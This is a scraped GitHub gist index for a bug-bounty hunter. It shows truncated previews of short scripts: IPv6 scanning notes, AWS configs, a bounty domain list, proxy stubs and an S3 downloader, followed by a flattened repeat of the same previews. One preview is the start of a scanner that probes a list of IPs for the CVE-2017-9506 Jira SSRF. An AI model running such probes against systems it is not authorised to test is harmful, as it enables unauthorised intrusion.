Techbrunch

## ipv6.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                Techbrunch
                / ipv6.md
            
            
              Created
              March 29, 2020 10:08
            
              
                IPV6 Scan on AWS
              
          
    Nmap IPV6 Scanning: https://nmap.org/book/port-scanning-ipv6.html

While IPv6 hasn't exactly taken the world by storm, it gets significant use in some countries and most modern operating systems support it. To use Nmap with IPv6, both the source and target of your scan must be configured for IPv6. If your ISP (like most of them) does not allocate IPv6 addresses to you, free tunnel brokers are widely available and work fine with Nmap. I use the free IPv6 tunnel broker service at http://www.tunnelbroker.net. Other tunnel brokers are listed at Wikipedia. 6to4 tunnels are another popular, free approach.

On AWS, enable IPV6 on the VPC, make sure to add an Internet Gateway with routes to the Internet in the route tables (0.0.0.0/0 and ::/0).
Source: https://docs.aws.amazon.com/vpc/latest/userguide/VPC_Internet_Gateway.html
You should now be able to scan IPV6 address:

  
## cwl-cake-errors.config
Mappings:
  CWLogs:
    CakeErrorLogGroup:
      LogFile: "/var/www/html/project/tmp/logs/error.log"
      TimestampFormat: "%m-%d-%Y %H:%M:%S"
    FilterPatterns:
      AllCakeErrorsFilter: "[timestamp, type = *Error*, ...]"


Outputs:

## bounty.txt
18f.gov
acorns.com
airbnb.com
airtable.com
algolia.com
alienvault.com
amazonaws.com
ambo.io
amitree.com
appspot.com

## app_proxy.rb
# ENDPOINT="host.com" ruby app_proxy.rb
# curl -i localhost:4567/capture # => "<TIMEOUT>" or regular response every 2 calls

require 'sinatra'
require 'net/http'

$request_settings = { host: ENV["ENDPOINT"] }
$headers = { "Content-Type" => "application/json" }
$counter = 0

## proxy.rb
require 'sinatra'
require 'openssl'
require 'base64'
require 'httparty'
require 'json'
require 'sinatra/custom_logger'
require 'logger'
require 'active_support/all'

set :logger, Logger.new(STDOUT)

## CVE-2017-9506.rb
require 'httparty'
require 'colorize'
File.readlines(ARGV[0]).each do |ip|
  ip.strip!

  begin
    print "ip: #{ip} - "
    response = HTTParty.get("http://#{ip}/plugins/servlet/oauth/users/icon-uri?consumerUri=http://remote",
                            {timeout: 5, verify: false, headers: { "User-Agent" => "POC" }})
    if response.code != 200 && response.code != 404

## pixel.rb
require 'chunky_png'

i = ChunkyPNG::Image.from_file(ARGV[0])
p = ChunkyPNG::Canvas.from_io(StringIO.new(i.to_blob))
p.crop(452,1600,61,63).save('test.png')

## intercal_decode.rb
arr = [238,140,120,0,112,154,194,172,72,32,24,240,160,232,26,52]
def decode(pos = 0, array)
  array.map { |x|
    pos = (256 + pos - x) % 256
    pos.to_s(2)
       .rjust(8, '0')
       .reverse
       .to_i(2)
       .chr
  }.join

## gist:d2e1a0539be4a561d9d6a62a31a04027
### Keybase proof

I hereby claim:

  * I am techbrunch on github.
  * I am techbrunch (https://keybase.io/techbrunch) on keybase.
  * I have a public key ASDcuKPV4Qvr8MkodHAlIjpCzi3vd6kZhspB_K5IgZTjrwo

To claim this, I am signing this object:

## s3_downloader.py
import boto3

prefix = ""
bucket = ""

client = boto3.client('s3')
paginator = client.get_paginator('list_objects')
operation_parameters = {'Bucket': bucket,
                        'Prefix': prefix}
page_iterator = paginator.paginate(**operation_parameters)
	Mappings:
	CWLogs:
	CakeErrorLogGroup:
	LogFile: "/var/www/html/project/tmp/logs/error.log"
	TimestampFormat: "%m-%d-%Y %H:%M:%S"
	FilterPatterns:
	AllCakeErrorsFilter: "[timestamp, type = Error, ...]"


	Outputs:
	18f.gov
	acorns.com
	airbnb.com
	airtable.com
	algolia.com
	alienvault.com
	amazonaws.com
	ambo.io
	amitree.com
	appspot.com
	# ENDPOINT="host.com" ruby app_proxy.rb
	# curl -i localhost:4567/capture # => "<TIMEOUT>" or regular response every 2 calls

	require 'sinatra'
	require 'net/http'

	$request_settings = { host: ENV["ENDPOINT"] }
	$headers = { "Content-Type" => "application/json" }
	$counter = 0
	require 'sinatra'
	require 'openssl'
	require 'base64'
	require 'httparty'
	require 'json'
	require 'sinatra/custom_logger'
	require 'logger'
	require 'active_support/all'

	set :logger, Logger.new(STDOUT)
	require 'httparty'
	require 'colorize'
	File.readlines(ARGV[0]).each do \|ip\|
	ip.strip!

	begin
	print "ip: #{ip} - "
	response = HTTParty.get("http://#{ip}/plugins/servlet/oauth/users/icon-uri?consumerUri=http://remote",
	{timeout: 5, verify: false, headers: { "User-Agent" => "POC" }})
	if response.code != 200 && response.code != 404
	require 'chunky_png'

	i = ChunkyPNG::Image.from_file(ARGV[0])
	p = ChunkyPNG::Canvas.from_io(StringIO.new(i.to_blob))
	p.crop(452,1600,61,63).save('test.png')
	arr = [238,140,120,0,112,154,194,172,72,32,24,240,160,232,26,52]
	def decode(pos = 0, array)
	array.map { \|x\|
	pos = (256 + pos - x) % 256
	pos.to_s(2)
	.rjust(8, '0')
	.reverse
	.to_i(2)
	.chr
	}.join
	### Keybase proof

	I hereby claim:

	* I am techbrunch on github.
	* I am techbrunch (https://keybase.io/techbrunch) on keybase.
	* I have a public key ASDcuKPV4Qvr8MkodHAlIjpCzi3vd6kZhspB_K5IgZTjrwo

	To claim this, I am signing this object:
	import boto3

	prefix = ""
	bucket = ""

	client = boto3.client('s3')
	paginator = client.get_paginator('list_objects')
	operation_parameters = {'Bucket': bucket,
	'Prefix': prefix}
	page_iterator = paginator.paginate(**operation_parameters)